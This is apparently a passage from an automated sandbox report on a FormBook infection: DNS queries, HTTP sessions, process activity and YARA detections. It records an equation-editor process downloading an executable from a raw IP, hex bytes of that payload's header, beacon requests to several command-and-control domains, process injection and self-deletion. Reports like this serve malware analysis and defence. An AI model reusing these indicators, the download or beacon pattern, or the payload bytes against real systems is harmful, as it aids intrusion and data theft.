                                                      Jan 28, 2022 22:38:59.240909100 CET192.168.2.228.8.8.80x9037Standard query (0)www.youngliving1.comA (IP address)IN (0x0001)
                                                      Jan 28, 2022 22:39:04.275386095 CET192.168.2.228.8.8.80xce43Standard query (0)www.frentags.artA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      Jan 28, 2022 22:38:38.171220064 CET8.8.8.8192.168.2.220xc18cNo error (0)www.927291.com1.32.255.137A (IP address)IN (0x0001)
                                                      Jan 28, 2022 22:38:43.863972902 CET8.8.8.8192.168.2.220xfc43No error (0)www.teentykarm.quest37.123.118.150A (IP address)IN (0x0001)
                                                      Jan 28, 2022 22:38:48.960673094 CET8.8.8.8192.168.2.220x9c63No error (0)www.zoharfine.comzoharfine.comCNAME (Canonical name)IN (0x0001)
                                                      Jan 28, 2022 22:38:48.960673094 CET8.8.8.8192.168.2.220x9c63No error (0)zoharfine.com194.5.156.29A (IP address)IN (0x0001)
                                                      Jan 28, 2022 22:38:54.113177061 CET8.8.8.8192.168.2.220x30e0No error (0)www.mollyagee.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)
                                                      Jan 28, 2022 22:38:54.113177061 CET8.8.8.8192.168.2.220x30e0No error (0)ghs.googlehosted.com172.217.168.19A (IP address)IN (0x0001)
                                                      Jan 28, 2022 22:38:59.272581100 CET8.8.8.8192.168.2.220x9037Name error (3)www.youngliving1.comnonenoneA (IP address)IN (0x0001)
                                                      Jan 28, 2022 22:39:04.464575052 CET8.8.8.8192.168.2.220xce43No error (0)www.frentags.art44.227.76.166A (IP address)IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • 212.192.246.120
                                                      • www.927291.com
                                                      • www.teentykarm.quest
                                                      • www.zoharfine.com
                                                      • www.mollyagee.com

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.2249165212.192.246.12080C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      TimestampkBytes transferredDirectionData
                                                      Jan 28, 2022 22:37:20.867891073 CET0OUTGET /gntek.exe HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: 212.192.246.120
                                                      Connection: Keep-Alive
                                                      Jan 28, 2022 22:37:20.896116972 CET1INHTTP/1.1 200 OK
                                                      Content-Type: application/octet-stream
                                                      Last-Modified: Fri, 28 Jan 2022 06:21:53 GMT
                                                      Accept-Ranges: bytes
                                                      ETag: "b7739b57f14d81:0"
                                                      Server: Microsoft-IIS/10.0
                                                      Date: Fri, 28 Jan 2022 21:37:20 GMT
                                                      Content-Length: 254186
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c9 cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5a 00 00 00 d4 01 00 00 04 00 00 25 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 59 00 00 00 10 00 00 00 5a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 c0 02 00 00 0a 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d a8 3e 42 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 48 72 40 00 e9 42 01 00 00 53 56 8b 35 b0 3e 42 00 8d 45 a4 57 50 ff 75 08 ff
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$uJ$$$/{$%:$"y$7$f"$Rich$PELHZ%2p@sp.textvYZ `.rdatap^@@.datap@.ndata@.rsrct@@U\}t+}FEuH>BHPuuuHr@BSV5>BEWPu


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      1192.168.2.22491661.32.255.13780C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jan 28, 2022 22:38:38.511356115 CET271OUTGET /b80i/?SZ5TuL=UugCFIKTrsouekFBGpmjj1lYYuG7Sqq7seOoZgmvymuhpKhoJBysXVQ1tfM8JEdSTWsNrA==&bZ30xx=0lLLAPA89 HTTP/1.1
                                                      Host: www.927291.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Jan 28, 2022 22:38:38.840186119 CET271INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Fri, 28 Jan 2022 21:38:38 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 146
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      2192.168.2.224916737.123.118.15080C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jan 28, 2022 22:38:43.893686056 CET272OUTGET /b80i/?SZ5TuL=J+u8pU8GtC7Crrbw9NxHruIy2NemieD/+UtpUO8UjTwhviPWCSXqrJc4wu/Y5neCzW0Lig==&bZ30xx=0lLLAPA89 HTTP/1.1
                                                      Host: www.teentykarm.quest
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Jan 28, 2022 22:38:43.922127962 CET272INHTTP/1.1 403 Forbidden
                                                      Server: nginx/1.10.3 (Ubuntu)
                                                      Date: Fri, 28 Jan 2022 21:38:43 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 178
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      3192.168.2.2249169194.5.156.2980C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jan 28, 2022 22:38:48.985671997 CET273OUTGET /b80i/?SZ5TuL=WIyhNSWdz3ksnrxMd9FPgtApU7fAeJTF2OsSNfT/loR2Vp0doC/CWPkVmL0jl9ASIxbbNA==&bZ30xx=0lLLAPA89 HTTP/1.1
                                                      Host: www.zoharfine.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Jan 28, 2022 22:38:49.024722099 CET274INHTTP/1.1 301 Moved Permanently
                                                      Connection: close
                                                      content-type: text/html
                                                      content-length: 707
                                                      date: Fri, 28 Jan 2022 21:38:49 GMT
                                                      server: LiteSpeed
                                                      location: https://www.zoharfine.com/b80i/?SZ5TuL=WIyhNSWdz3ksnrxMd9FPgtApU7fAeJTF2OsSNfT/loR2Vp0doC/CWPkVmL0jl9ASIxbbNA==&bZ30xx=0lLLAPA89
                                                      content-security-policy: upgrade-insecure-requests
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      4192.168.2.2249170172.217.168.1980C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jan 28, 2022 22:38:54.132006884 CET275OUTGET /b80i/?SZ5TuL=XkBoiSzcHlsmqFkYMGKyxhKE5R0ucNDlHWw1mrTAF5aGMvlxAg1/o3H+/I9n3Xzt0JsmTA==&bZ30xx=0lLLAPA89 HTTP/1.1
                                                      Host: www.mollyagee.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Jan 28, 2022 22:38:54.234707117 CET276INHTTP/1.1 301 Moved Permanently
                                                      Location: https://mollyagee.remax.com/b80i/?SZ5TuL=XkBoiSzcHlsmqFkYMGKyxhKE5R0ucNDlHWw1mrTAF5aGMvlxAg1/o3H+/I9n3Xzt0JsmTA==&bZ30xx=0lLLAPA89
                                                      Date: Fri, 28 Jan 2022 21:38:54 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Server: ghs
                                                      Content-Length: 331
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 6d 6f 6c 6c 79 61 67 65 65 2e 72 65 6d 61 78 2e 63 6f 6d 2f 62 38 30 69 2f 3f 53 5a 35 54 75 4c 3d 58 6b 42 6f 69 53 7a 63 48 6c 73 6d 71 46 6b 59 4d 47 4b 79 78 68 4b 45 35 52 30 75 63 4e 44 6c 48 57 77 31 6d 72 54 41 46 35 61 47 4d 76 6c 78 41 67 31 2f 6f 33 48 2b 2f 49 39 6e 33 58 7a 74 30 4a 73 6d 54 41 3d 3d 26 61 6d 70 3b 62 5a 33 30 78 78 3d 30 6c 4c 4c 41 50 41 38 39 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://mollyagee.remax.com/b80i/?SZ5TuL=XkBoiSzcHlsmqFkYMGKyxhKE5R0ucNDlHWw1mrTAF5aGMvlxAg1/o3H+/I9n3Xzt0JsmTA==&amp;bZ30xx=0lLLAPA89">here</A>.</BODY></HTML>


                                                      Statistics

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:22:36:16
                                                      Start date:28/01/2022
                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                      Imagebase:0x13f860000
                                                      File size:28253536 bytes
                                                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:2
                                                      Start time:22:36:38
                                                      Start date:28/01/2022
                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                      Imagebase:0x400000
                                                      File size:543304 bytes
                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:4
                                                      Start time:22:36:40
                                                      Start date:28/01/2022
                                                      Path:C:\Users\Public\vbc.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\Public\vbc.exe"
                                                      Imagebase:0x400000
                                                      File size:254186 bytes
                                                      MD5 hash:C2CA2BA9C38EB02217588662717BA6C3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.463214486.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.463214486.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.463214486.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 35%, ReversingLabs
                                                      Reputation:low

                                                      General

                                                      Target ID:5
                                                      Start time:22:36:42
                                                      Start date:28/01/2022
                                                      Path:C:\Users\Public\vbc.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\Public\vbc.exe"
                                                      Imagebase:0x400000
                                                      File size:254186 bytes
                                                      MD5 hash:C2CA2BA9C38EB02217588662717BA6C3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.505448080.0000000002380000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.505448080.0000000002380000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.505448080.0000000002380000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.503909309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.503909309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.503909309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.461534405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.461534405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.461534405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      General

                                                      Target ID:6
                                                      Start time:22:36:46
                                                      Start date:28/01/2022
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0xffa10000
                                                      File size:3229696 bytes
                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.495106003.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.495106003.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.495106003.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.488208515.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.488208515.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.488208515.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:high

                                                      General

                                                      Target ID:7
                                                      Start time:22:37:01
                                                      Start date:28/01/2022
                                                      Path:C:\Windows\SysWOW64\msdt.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\msdt.exe
                                                      Imagebase:0xa40000
                                                      File size:983040 bytes
                                                      MD5 hash:F67A64C46DE10425045AF682802F5BA6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.668987103.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.668987103.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.668987103.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.669043733.0000000000220000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.669043733.0000000000220000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.669043733.0000000000220000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.669096973.0000000000330000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.669096973.0000000000330000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.669096973.0000000000330000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      General

                                                      Target ID:8
                                                      Start time:22:37:05
                                                      Start date:28/01/2022
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/c del "C:\Users\Public\vbc.exe"
                                                      Imagebase:0x4a780000
                                                      File size:302592 bytes
                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Disassembly

                                                      No disassembly